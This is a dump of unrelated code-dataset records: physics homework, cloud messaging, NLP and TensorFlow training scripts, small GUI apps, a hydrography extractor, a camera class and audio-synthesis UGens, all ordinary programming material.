HW 5, prob 
2\nisotopes = {'H3':0, 'He3':1, 'He4':2, 'He6':3, 'Li6':4, 'Li7':5, 'Li8':6, 'Li9':7,\n 'Be8':8, 'Be9':9, 'Be10':10, 'B10':11}\n\ndef decay(isotopes, tope):\n return None\n\n'''\n# ---------------------------------------------------------------------------\n# ---------------------------------------------------------------------------\n\"\"\"Different Nuclear Reactions\nInputs:\n isotopes: python dictionary containing matrix indices for isotopes\n tope: nucleus that undergoes some nuclear reaction\nOutputs:\n tope: new nucleus created from nulcear reaction\n value: either half-life [days]\n or cross sections for 2.45 MeV and 14.1 MeV [barns]\n\"\"\"\n\ndef betadecay(isotopes, tope):\n if tope == 'F18': return isotopes['O18'], 1.8295 #hours\n\n elif tope == 'H3': return isotopes['He3'], 4500 #days\n elif tope == 'He6': return isotopes['Li6'], 0.8067 #sec\n elif tope == 'Li8': return isotopes['Be8'], 0.8403 #sec\n elif tope == 'Li9': return isotopes['Be9'], 0.1783 #sec\n elif tope == 'Be10': return isotopes['B10'], 1387000 #years\n else: return -1, 0\n\ndef capture(isotopes, tope):\n if tope == 'F19': return isotopes['F20'], 8.649107E-5, 3.495035E-5\n\n else: return -1, 0\n\ndef n_alpha(isotopes, tope):\n\n else: return -1, 0\n\ndef n_p(isotopes, tope):\n if tope == 'F19': return isotopes['O19'], 0.0, 0.018438\n\n if tope == 'Li6': return isotopes['He6'], 0, 0.00604\n elif tope == 'Be9': return isotopes['Li9'], 0, 0\n else: return -1, 0\n\ndef n_d(isotopes, tope):\n if tope == 'F19': return isotopes['O18'], 0.0, 0.022215\n\n if tope == 'Li7': return isotopes['He6'], 0, 0.010024\n elif tope == 'Be9': return isotopes['Li8'], 0, 0\n else: return -1, 0\n\ndef n_t(isotopes, tope):\n if tope == 'Be9': return isotopes['Li7'], 0, 0.020327\n else: return -1, 0\n\ndef n_2n(isotopes, tope):\n if tope == 'F19': return isotopes['F18'], 0.0, 0.04162\n\n if tope == 'Li7': return isotopes['Li6'], 0, 0.031743\n elif tope == 'Be9': return isotopes['Be8'], 0.0205, 0.485944\n else: return -1, 0\n\ndef n_nalpha(isotopes, tope):\n if tope == 'Li7': return isotopes['H3'], 0, 0.302149\n else: return -1, 0\n\ndef n_np(isotopes, tope):\n if tope == 'F19': return isotopes['O18'], 0.0, 0.061973\n\ndef n_nd(isotopes, tope):\n if tope == 'Li6': return isotopes['He4'], 0.05948, 0.473592\n else: return -1, 0\n# ---------------------------------------------------------------------------\n# ---------------------------------------------------------------------------\n\n\nprint(capture(isotopes,'H3'))\nfor tope in isotopes:\n print(isotopes[tope])\n'''\n","sub_path":"Help_from_James/HW5/vaq_hw5.py","file_name":"vaq_hw5.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"193782149","text":"#!/usr/bin/env python\n\n# Copyright 2016 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"This application demonstrates how to perform basic operations on topics\nwith the Cloud Pub/Sub API.\n\nFor more information, see the README.md under /pubsub and the documentation\nat https://cloud.google.com/pubsub/docs.\n\"\"\"\n\nimport argparse\nimport time\n\nfrom google.cloud import pubsub_v1\n\n\ndef publish_messages(project, topic_name):\n \"\"\"Publishes multiple messages to a Pub/Sub topic.\"\"\"\n publisher = pubsub_v1.PublisherClient()\n topic_path = publisher.topic_path(project, topic_name)\n\n for n in range(1, 600):\n data = u'Message number {}'.format(n)\n # Data must be a bytestring\n data = data.encode('utf-8')\n publisher.publish(topic_path, data=data)\n time.sleep(5)\n\n print('Published messages.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument('project', help='Your Google Cloud project ID')\n\n subparsers = parser.add_subparsers(dest='command')\n\n publish_parser = subparsers.add_parser(\n 'publish', help=publish_messages.__doc__)\n publish_parser.add_argument('topic_name')\n\n args = parser.parse_args()\n\n if args.command == 'publish':\n print('Publishing messages... 
Press CTRL+C to interrupt.')\n publish_messages(args.project, args.topic_name)\n","sub_path":"adaptive-triggers/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"88894549","text":"from torch.utils.data import Dataset\nimport json\nfrom tqdm import tqdm\nimport torch\n\nROPES_DATA_PATH = 'data/ropes/'\nMAX_PARAGRAPH_LEN = 400\n\nclass ROPES(Dataset):\n def __init__(self, tokenizer, file_path, eval=False):\n self.tokenizer = tokenizer\n self.eval = eval\n contexts, questions, answers, qids = get_examples(file_path)\n self.qids = qids\n self.questions = questions\n self.contexts = contexts\n self.answers = answers\n self.encodings = tokenizer(contexts, questions, padding=True, truncation=True)\n self._update_start_end_idxs()\n\n def _update_start_end_idxs(self):\n starts = []\n ends = []\n question_encodings = self.tokenizer(self.questions)\n context_encodings = self.tokenizer(self.contexts)\n\n for i in tqdm(range(len(self.answers))):\n answer = self.answers[i]\n #tokens = self.tokenizer.convert_ids_to_tokens(self.encodings['input_ids'][i])\n q_idx = self.questions[i].find(answer)\n c_idx = self.contexts[i].find(answer)\n\n if q_idx != -1:\n assert(self.questions[i][q_idx:q_idx+len(answer)] == answer)\n y1 = question_encodings.char_to_token(i, q_idx)-1+len(context_encodings[i])\n y2 = question_encodings.char_to_token(i, q_idx+len(answer)-1)\n\n if not y2 and y1:\n y2 = y1 + len(self.tokenizer.tokenize(answer)) - 1\n elif y1:\n y2 += -1+len(context_encodings[i])\n\n y1 = min(y1, 512)\n y2 = min(y2, 512)\n\n elif c_idx != -1:\n y1 = self.encodings.char_to_token(i, c_idx)\n y2 = self.encodings.char_to_token(i, c_idx+len(answer)-1)\n if not y1:\n y1, y2 = 512, 512\n if not y2 and y1:\n y2 = y1 + len(self.tokenizer.tokenize(answer)) - 1\n\n starts.append(y1)\n ends.append(y2)\n\n\n self.encodings['start_positions'] = starts\n self.encodings['end_positions'] = ends\n\n def __getitem__(self, idx):\n inputs = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n if self.eval:\n inputs['id'] = self.qids[idx]\n return inputs\n\n def __len__(self):\n return len(self.answers)\n\n\ndef get_examples(file_path):\n contexts, questions, answers, qids = [], [], [], []\n with open(f'{ROPES_DATA_PATH}{file_path}', 'r', encoding='utf-8') as f:\n data = json.load(f)\n data = data['data']\n for article in tqdm(data):\n for para in article['paragraphs']:\n background = para['background']\n situation = para['situation']\n context = background + ' ' + situation\n for qa in para['qas']:\n id = qa['id']\n question = qa['question']\n for ans in qa['answers']:\n answer = ans['text']\n contexts.append(context)\n questions.append(question)\n answers.append(answer)\n qids.append(id)\n\n return contexts, questions, answers, qids\n\nif __name__ == '__main__':\n from transformers import BertTokenizerFast\n\n tokenizer = BertTokenizerFast.from_pretrained('bert-base-cased')\n dataset = ROPES(tokenizer, 'train-v1.0.json')\n print(len(dataset[0]['input_ids']))\n\n\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"16825466","text":"#Christina Roberts\r\n#How to Code 2.0\r\n\r\n\r\nfrom tkinter import*\r\n\r\nprint(\"Please left click anywhere on the canvas. 
Thank you.\")\r\n\r\n\r\ndef main():\r\n root = Tk()\r\n my_window = Canvas(root, width = 300, height = 300)\r\n my_window.pack()\r\n my_window.bind(\"<Button>\", test_click)\r\n root.mainloop()\r\ndef test_click(event):\r\n \r\n print(\"Clicked at: \", event.x, event.y)\r\n\r\n\r\n\r\n\r\nmain()\r\n","sub_path":"click_event.py","file_name":"click_event.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"201680345","text":"from lxml import etree\nimport ConfigParser, os\n\nsettings = ConfigParser.ConfigParser()\n\nif os.path.split(os.getcwd())[-1] == 'lib':\n settings.read('../conf/assessment.conf')\nelse:\n settings.read('conf/assessment.conf')\n\ndef evaluateReport(report_file):\n alerts = []\n report = etree.parse(report_file)\n find_text = etree.XPath( \"/SECANT/PAKITI_TEST/PKG/text()\")\n pkgs = find_text(report)\n if pkgs:\n for pkg in pkgs:\n alerts.append(\"Vulnerable package: \" + pkg)\n return alerts","sub_path":"internal_tests/pakiti_test/pakiti_test.py","file_name":"pakiti_test.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"25348476","text":"#send button will be disabled while running\n#after complete run ,again start button will able to click\n#while loop instead of for loop\n#infinite loop for 0 option in [how many times]\n\n\nfrom tkinter import *\nfrom threading import *\nimport pyautogui as pag\nimport time\n\nmw = Tk()\nmw.title('auto messenger')\nmw.iconbitmap('images/msg.ico')\n\ndef justcheck(check):\n if check:\n send_btn.config(text='running...', state='disabled')\n else:\n send_btn.config(text='start sending..', state='normal')\n\n\nclass automessenger(Thread): #class\n hmt_c = 5\n wt_c = 3\n msg_c = 'running'\n def run(self):\n justcheck(True)\n i=1\n while True:\n time.sleep(self.wt_c)\n pag.typewrite(self.msg_c)\n pag.press('enter')\n if self.hmt_c==i:\n justcheck(False)\n break\n i +=1\n\n\ndef messenger(hmt, wt, msg):\n send = automessenger() #object of class\n send.hmt_c = int(hmt)\n send.wt_c = float(wt)\n send.msg_c = msg\n send.daemon = True #to stop the sub thread automatically after the main thead is stopped\n send.start() #calling of method\n\n\n# creating widgets\nhmt_label = Label(mw, text='How Many Times:', font=('Arial', 14)) # hmt=how many times\nhmt_input = Entry(mw, width=5, font=('Arial', 18))\nhmt_times = Label(mw, text='Times', font=('Arial', 12))\n\nwt_label = Label(mw, text='Waiting Time :', font=('Arial', 14)) # wt = waiting times\nwt_input = Entry(mw, width=5, font=('Arial', 18))\nwt_sec = Label(mw, text='Seconds', font=('Arial', 12))\n\nmsg_label = Label(mw, text='Mesage:', font=('Arial', 14)) # msg= message\nmsg_input = Entry(mw, width=30, font=('Arial', 18)) # width=30, box will be bigger on x axis\n\nsend_btn = Button(mw, text='start sending!', font=('Arial', 14), command=lambda: messenger(hmt_input.get(), wt_input.get(), msg_input.get()))\n\n# showing widgets\nhmt_label.grid(row=0, column=0, padx=10, pady=10, sticky=E) # sticky specify the location either east,west,north,south\nhmt_input.grid(row=0, column=1, padx=10, pady=10, sticky=W)\nhmt_times.grid(row=0, column=1, padx=100, pady=10, sticky=W)\n\nwt_label.grid(row=1, column=0, padx=10, pady=10, sticky=E)\nwt_input.grid(row=1, column=1, padx=10, pady=10, sticky=W)\nwt_sec.grid(row=1, column=1, padx=100, pady=10, sticky=W)\n\nmsg_label.grid(row=2, column=0, padx=10, pady=10, 
sticky=E)\nmsg_input.grid(row=2, column=1, padx=10, pady=10, sticky=W)\n\nsend_btn.grid(row=3, column=1, pady=25)\n\nmw.mainloop()\n\n#justcheck\n#class automesenger\n#def messenger(hmt,wt,msg)","sub_path":"messagefinal.py","file_name":"messagefinal.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"469569740","text":"\"\"\"Extract NHDPoint to use for the network analysis.\n\nPoint types listing: https://prd-wret.s3-us-west-2.amazonaws.com/assets/palladium/production/s3fs-public/atoms/files/NHDv2.2.1_poster_081216.pdf\n\"\"\"\n\nfrom pathlib import Path\nimport os\nfrom time import time\n\nimport geopandas as gp\nfrom geofeather import to_geofeather, from_geofeather\nfrom nhdnet.geometry.points import to2D\nfrom nhdnet.io import serialize_df, deserialize_df, serialize_sindex, to_shp\n\nfrom analysis.constants import REGIONS, REGION_GROUPS, CRS\n\nKEEP_COLS = [\"NHDPlusID\", \"FType\", \"FCode\", \"GNIS_Name\", \"geometry\"]\n\n# Dam, reservoir, waterfall\nKEEP_FTYPES = [343, 436, 487]\n\n\nsrc_dir = Path(\"data/nhd/source/huc4\")\nnhd_dir = Path(\"data/nhd\")\n\n\nout_dir = nhd_dir / \"extra\"\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nstart = time()\n\nmerged = None\nfor region, HUC2s in REGION_GROUPS.items():\n print(\"\\n----- {} ------\\n\".format(region))\n\n for HUC2 in HUC2s:\n for i in REGIONS[HUC2]:\n HUC4 = \"{0}{1:02d}\".format(HUC2, i)\n\n read_start = time()\n print(\"\\n\\n------------------- Reading {} -------------------\".format(HUC4))\n gdb = src_dir / HUC4 / \"NHDPLUS_H_{HUC4}_HU4_GDB.gdb\".format(HUC4=HUC4)\n\n df = gp.read_file(gdb, layer=\"NHDPoint\")\n df.NHDPlusID = df.NHDPlusID.astype(\"uint64\")\n\n df = df.loc[df.FType.isin(KEEP_FTYPES)][KEEP_COLS].copy()\n\n df.geometry = df.geometry.apply(to2D)\n df = df.to_crs(CRS)\n\n df.FType = df.FType.astype(\"uint16\")\n df.FCode = df.FCode.astype(\"uint16\")\n df[\"HUC2\"] = HUC2\n\n if merged is None:\n merged = df\n else:\n merged = merged.append(df, ignore_index=True, sort=False)\n\nprint(\"Extracted {:,} NHD Points\".format(len(merged)))\ndf = merged.reset_index(drop=True)\n\n# add our own ID,\ndf[\"id\"] = df.index.values.copy()\ndf.id = (df.id + 1).astype(\"uint32\")\n\nprint(\"Serializing {:,} points...\".format(len(df)))\nto_geofeather(df, out_dir / \"nhd_points.feather\")\nto_shp(df, out_dir / \"nhd_points.shp\")\n\nprint(\"Done in {:.2f}s\\n============================\".format(time() - start))\n","sub_path":"analysis/prep/network/extract_nhd_points.py","file_name":"extract_nhd_points.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"82564052","text":"from pool_table_class import PoolTable\nfrom datetime import datetime, timedelta\nimport json\nimport time\n\ntables = []\nlog_lists = []\n\n\ndef main(tables, log_lists):\n for i in range(1, 13):\n pool = PoolTable(i)\n tables.append(pool)\n\n def calculate_duration_time(start_time):\n current_time = datetime.now()\n\n time_duration = current_time - start_time\n\n duration_in_seconds = time_duration.total_seconds()\n\n minute = duration_in_seconds / 60\n\n if minute < 1:\n minute = 0\n\n return round(minute)\n\n def calculate_total_time_played(total_time):\n total_in_seconds = total_time.total_seconds()\n\n minute = total_in_seconds / 60\n\n if minute < 1:\n minute = 0\n\n return round(minute)\n\n def calculate_amount(min):\n hour = min / 60\n amt = 
hour * 30\n\n return amt\n\n def display_tables(tables):\n date = datetime.now().strftime(\"%m-%d-%Y\")\n print(f\"\\nToday's date: {date}\")\n print(\"------------------------------------------------------------------\")\n for table in tables:\n if table.is_occupied:\n if table.time_start == None:\n print(\n f\"Table {table.number} - Occupied || Checked out: {table.start_time_display}) || 0 minute(s)\")\n else:\n minute = calculate_duration_time(table.time_start)\n\n print(\n f\"Table {table.number} - Occupied || Checked out: {table.start_time_display} || {'%.0f' % minute} minute(s)\")\n else:\n print(f\"Table {table.number} - Not Occupied\")\n print(\"------------------------------------------------------------------\\n\")\n\n def save_log(log_lists, number, start_time, end_time, min):\n date = datetime.now().strftime(\"%m-%d-%Y\")\n\n log = {\"Table Number\": number,\n \"Check-out Time\": start_time,\n \"Check-in Time\": end_time,\n \"Time Played (in minute)\": min}\n\n with open(f\"{date}.json\", \"w\") as file:\n log_lists.append(log)\n json.dump(log_lists, file)\n\n def print_out_log():\n date = datetime.now().strftime(\"%m-%d-%Y\")\n\n with open(f\"{date}.json\") as file:\n log_files = json.load(file)\n for file in log_files:\n print(f\"Table Number: {file['Table Number']}\")\n print(f\"Check-out Time: {file['Check-out Time']}\")\n print(f\"Check-in Time: {file['Check-in Time']}\")\n print(\n f\"Total Time Played: {'.%0f' % file['Time Played (in minute)']} minute(s)\")\n print('-------------------------------')\n\n while True:\n choice = int(input(\"\"\"Please choose the option number: \n 1. Display the status of the pool tables\n 2. Check out the pool table\n 3. Check in the pool table\n 4. Quit the program\n \"\"\"))\n\n if choice == 1:\n display_tables(tables)\n\n elif choice == 2:\n display_tables(tables)\n\n table_num = int(input(\n \"\\nPlease enter the table number to check out: \"))\n\n table = tables[table_num-1]\n\n if table.is_occupied:\n print(f\"\\nPool Table {table_num} is currently occupied.\\n\")\n else:\n table.check_out_table()\n display_tables(tables)\n\n elif choice == 3:\n display_tables(tables)\n\n table_num = int(\n input(\"Please enter the table number to check in: \"))\n\n table = tables[table_num-1]\n table.check_in_table()\n\n min = calculate_total_time_played(table.total_time)\n amount = calculate_amount(min)\n\n display_tables(tables)\n\n print(f\"\\nPool Table {table_num}\")\n print(f\" - Check in Time: {table.end_time_display}\")\n print(f\" - Total Time Played: {'%.0f' % min} minute(s)\")\n print(f\" - The Total Cost: ${'%.2f' % amount}\\n\\n\")\n\n save_log(log_lists, table.number, table.start_time_display,\n table.end_time_display, min)\n\n elif choice == 4:\n break\n\n else:\n print(\"You entered the wrong input. 
Please try again\")\n\n # Reading from .json file and printing out\n # print(\"\\nPrinting out the today's log..\\n\")\n # time.sleep(3)\n # print('-------------------------------')\n # print_out_log()\n\n\nmain(tables, log_lists)\n","sub_path":"pool_table_main.py","file_name":"pool_table_main.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"563114925","text":"#\r\n#一只青蛙掉在井里了,井高20米,\r\n# 青蛙白天往上爬3米,晚上下滑2米,\r\n# 问第几天能出来?请编程求出。\r\n#\r\n\r\n#掉下去的天数\r\nday = 1\r\n#距离井口的米数\r\nmeter = 20\r\n\r\nwhile meter>0:\r\n meter -= 3\r\n if meter<=0:\r\n break\r\n meter += 2\r\n day += 1\r\n\r\nprint(\"青蛙跳出来了\")\r\nprint(\"青蛙总共跳了\",day,\"天\")\r\n","sub_path":"frog.py","file_name":"frog.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"547181776","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport math\n\nimport argparse\nimport sys\nimport tempfile\nimport csv\nimport numpy as np \nfrom input_data_backward import convert_predicted_data\nfrom backward_model import ventral_feed_backward \nimport tensorflow as tf\nimport pickle \n\n\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\nbatch_size = 200\n\n\n\n\ndef main(unused_argv):\n \n # Create the Estimator\n classifier = tf.estimator.Estimator(model_fn=ventral_feed_backward, model_dir=\"/tmp/my_back_model\")\n\n #'''\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n \n\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=100)\n\n print(\"Reading Train data\")\n with open('../data_for_backward_training.pkl', 'r') as f: \n train_data, train_labels, _,_= pickle.load(f)\n\n\n\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x= convert_predicted_data(train_data),\n y= convert_positions(labels = train_labels),\n batch_size= batch_size,\n num_epochs=None,\n shuffle=True)\n \n classifier.train(\n input_fn=train_input_fn,\n steps=40000,\n hooks=[logging_hook])\n #'''\n\n\n# read in eval data after done: \n\n with open('../predict_files.pkl', 'r') as f: \n _,_,eval_data,eval_labels= pickle.load(f)\n \n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x= convert_predicted_data(eval_data),\n y= convert_positions(labels = eval_labels),\n num_epochs=1,\n shuffle=False)\n\n\n eval_results = classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"model_src/colour/bw_network/train_backward_network.py","file_name":"train_backward_network.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"595121242","text":"# Use open to open file \"foo.txt\" for reading\nfile = open(\"foo.txt\", \"r\") \nfile_object = file.read()\n# Print all the lines in the file\nprint(file_object) \n\n# Close the file\nfile.close()\n\n# Use open to open file \"bar.txt\" for writing\nfile2 = open(\"bar.txt\", \"w\") \n# Use the write() method to write three lines to the file\nfile2.write(\"imran imran\")\nfile2.close()\n\nafterWrite =open(\"bar.txt\", \"r\")\nfile_object2 = afterWrite.read()\nprint(file_object2)\n\n# Close the 
file\n\nafterWrite.close()","sub_path":"src/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"250419796","text":"from os import path\nfrom shutil import copyfile\n\nimport cv2\nimport numpy as np\n\nfrom j_math.camera import Camera\nfrom j_math.point import Point\nfrom j_math.rotation import Rotation\n\nclass MVSCamera(Camera):\n def __init__(self, index, position, rotation, fx, fy, cx, cy, depth_min, depth_interval):\n Camera.__init__(self, position, rotation, fx, fy, cx, cy)\n self.index = index\n self.depth_min = depth_min\n self.depth_interval = depth_interval\n self.image_path = None\n\n def set_image_file(self, file_path):\n self.image_path = file_path\n\n def to_string(self):\n return '\\n'.join([\n 'extrinsic',\n ' '.join(str(i) for i in self.extrinsic[0]),\n ' '.join(str(i) for i in self.extrinsic[1]),\n ' '.join(str(i) for i in self.extrinsic[2]),\n ' '.join(str(i) for i in self.extrinsic[3]),\n '',\n 'intrinsic',\n ' '.join(str(i) for i in self.intrinsic[0]),\n ' '.join(str(i) for i in self.intrinsic[1]),\n ' '.join(str(i) for i in self.intrinsic[2]),\n '',\n '{} {}'.format(self.depth_min, self.depth_interval),\n ''\n ])\n\n def from_string(self, string):\n lines = string.splitlines()\n if lines[0] != 'extrinsic' or lines[6] != 'intrinsic':\n raise Exception('invalid format')\n extrinsic_r_0 = np.array([float(v) for v in lines[1].strip().split()])\n extrinsic_r_1 = np.array([float(v) for v in lines[2].strip().split()])\n extrinsic_r_2 = np.array([float(v) for v in lines[3].strip().split()])\n extrinsic_r_3 = np.array([float(v) for v in lines[4].strip().split()])\n extrinsic = np.array([extrinsic_r_0,\n extrinsic_r_1,\n extrinsic_r_2,\n extrinsic_r_3])\n intrinsic_r_0 = np.array([float(v) for v in lines[7].strip().split()])\n intrinsic_r_1 = np.array([float(v) for v in lines[8].strip().split()])\n intrinsic_r_2 = np.array([float(v) for v in lines[9].strip().split()])\n intrinsic = np.array([intrinsic_r_0,\n intrinsic_r_1,\n intrinsic_r_2])\n\n depths = np.array([float(v) for v in lines[11].strip().split()])\n depth_min = depths[0]\n depth_int = depths[1]\n self.extrinsic = extrinsic\n self.intrinsic = intrinsic\n self.depth_min = depth_min\n self.depth_interval = depth_int\n \n\n def to_file(self, output_path):\n image_file_name = '{:08d}.jpg'.format(self.index)\n image_file_path = path.join(output_path, 'images', image_file_name)\n # write image iff path exists\n if(self.image_path):\n copyfile(self.image_path, image_file_path)\n else:\n raise Exception('No image found')\n\n camera_file_name = '{:08d}_cam.txt'.format(self.index)\n camera_file_path = path.join(output_path, 'cams', camera_file_name)\n\n # write camera\n with open(camera_file_path, 'w') as f:\n f.writelines(self.to_string())\n\n @staticmethod\n def from_file(file_path):\n image_name = file_path.split('/')[-1]\n image_prefix = image_name[0:8]\n mvs_path = '/'.join(file_path.split('/')[0:-2])\n image_path = path.join(mvs_path, 'images', image_prefix + '.jpg')\n\n pos = Point()\n rot = Rotation()\n fx = 0\n fy = 0\n cx = 0\n cy = 0\n dm = 0\n di = 0\n\n mvs_camera = MVSCamera(0, pos, rot, fx, fy, cx, cy, dm, di)\n with open(file_path, 'r') as f:\n mvs_camera.from_string(f.read())\n mvs_camera.index = int(image_prefix)\n return 
mvs_camera\n","sub_path":"scripts/mvs/mvs_camera.py","file_name":"mvs_camera.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"2363126","text":"import collections\n\nfrom supriya import CalculationRate\nfrom supriya.synthdefs import UGen\n\n\nclass Done(UGen):\n \"\"\"\n Triggers when `source` sets its `done` flag.\n\n ::\n\n >>> source = supriya.ugens.Line.kr()\n >>> done = supriya.ugens.Done.kr(source=source,)\n >>> done\n Done.kr()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _ordered_input_names = collections.OrderedDict([(\"source\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n ### INITIALIZER ###\n\n def __init__(self, calculation_rate=None, source=None):\n if not (hasattr(source, \"has_done_flag\") and source.has_done_flag):\n raise ValueError(repr(source))\n UGen.__init__(self, calculation_rate=calculation_rate, source=source)\n\n\nclass EnvGen(UGen):\n \"\"\"\n An envelope generator.\n\n ::\n\n >>> envelope = supriya.synthdefs.Envelope.percussive()\n >>> supriya.ugens.EnvGen.ar(envelope=envelope)\n EnvGen.ar()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _has_done_flag = True\n _ordered_input_names = collections.OrderedDict(\n [\n (\"gate\", 1.0),\n (\"level_scale\", 1.0),\n (\"level_bias\", 0.0),\n (\"time_scale\", 1.0),\n (\"done_action\", 0.0),\n (\"envelope\", None),\n ]\n )\n _unexpanded_input_names = (\"envelope\",)\n _valid_calculation_rates = (CalculationRate.AUDIO, CalculationRate.CONTROL)\n\n ### PRIVATE METHODS ###\n\n @classmethod\n def _new_expanded(\n cls,\n calculation_rate=None,\n done_action=None,\n envelope=None,\n gate=1.0,\n level_bias=0.0,\n level_scale=1.0,\n time_scale=1.0,\n ):\n import supriya.synthdefs\n\n if not isinstance(done_action, supriya.synthdefs.Parameter):\n done_action = supriya.DoneAction.from_expr(done_action)\n if envelope is None:\n envelope = supriya.synthdefs.Envelope()\n assert isinstance(envelope, supriya.synthdefs.Envelope)\n envelope = envelope.serialize()\n return super(EnvGen, cls)._new_expanded(\n calculation_rate=calculation_rate,\n done_action=done_action,\n envelope=envelope,\n gate=gate,\n level_bias=level_bias,\n level_scale=level_scale,\n time_scale=time_scale,\n )\n\n\nclass Free(UGen):\n \"\"\"\n Frees the node at `node_id` when triggered by `trigger`.\n\n ::\n\n >>> node_id = 1000\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> free = supriya.ugens.Free.kr(node_id=node_id, trigger=trigger,)\n >>> free\n Free.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict(\n [(\"trigger\", 0.0), (\"node_id\", None)]\n )\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass FreeSelf(UGen):\n \"\"\"\n Frees the enclosing synth when triggered by `trigger`.\n\n ::\n\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> free_self = supriya.ugens.FreeSelf.kr(trigger=trigger,)\n >>> free_self\n FreeSelf.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict([(\"trigger\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass FreeSelfWhenDone(UGen):\n \"\"\"\n Frees the enclosing synth when `source` sets its `done` flag.\n\n ::\n\n >>> source = supriya.ugens.Line.kr()\n >>> free_self_when_done = supriya.ugens.FreeSelfWhenDone.kr(source=source,)\n >>> free_self_when_done\n FreeSelfWhenDone.kr()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _ordered_input_names = collections.OrderedDict([(\"source\", None)])\n _valid_calculation_rates = 
(CalculationRate.CONTROL,)\n\n ### INITIALIZER ###\n\n def __init__(self, calculation_rate=None, source=None):\n if not (hasattr(source, \"has_done_flag\") and source.has_done_flag):\n raise ValueError(repr(source))\n UGen.__init__(self, calculation_rate=calculation_rate, source=source)\n\n\nclass Pause(UGen):\n \"\"\"\n Pauses the node at `node_id` when triggered by `trigger`.\n\n ::\n\n >>> node_id = 1000\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> pause = supriya.ugens.Pause.kr(node_id=node_id, trigger=trigger,)\n >>> pause\n Pause.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict(\n [(\"trigger\", None), (\"node_id\", None)]\n )\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass PauseSelf(UGen):\n \"\"\"\n Pauses the enclosing synth when triggered by `trigger`.\n\n ::\n\n >>> trigger = supriya.ugens.Impulse.kr(frequency=1.0)\n >>> pause_self = supriya.ugens.PauseSelf.kr(trigger=trigger,)\n >>> pause_self\n PauseSelf.kr()\n\n \"\"\"\n\n _ordered_input_names = collections.OrderedDict([(\"trigger\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n\nclass PauseSelfWhenDone(UGen):\n \"\"\"\n Pauses the enclosing synth when `source` sets its `done` flag.\n\n ::\n\n >>> source = supriya.ugens.Line.kr()\n >>> pause_self_when_done = supriya.ugens.PauseSelfWhenDone.kr(source=source,)\n >>> pause_self_when_done\n PauseSelfWhenDone.kr()\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n _ordered_input_names = collections.OrderedDict([(\"source\", None)])\n _valid_calculation_rates = (CalculationRate.CONTROL,)\n\n ### INITIALIZER ###\n\n def __init__(self, calculation_rate=None, source=None):\n if not (hasattr(source, \"has_done_flag\") and source.has_done_flag):\n raise ValueError(repr(source))\n UGen.__init__(self, calculation_rate=calculation_rate, source=source)\n\n\nclass Linen(UGen):\n \"\"\"\n A simple line generating unit 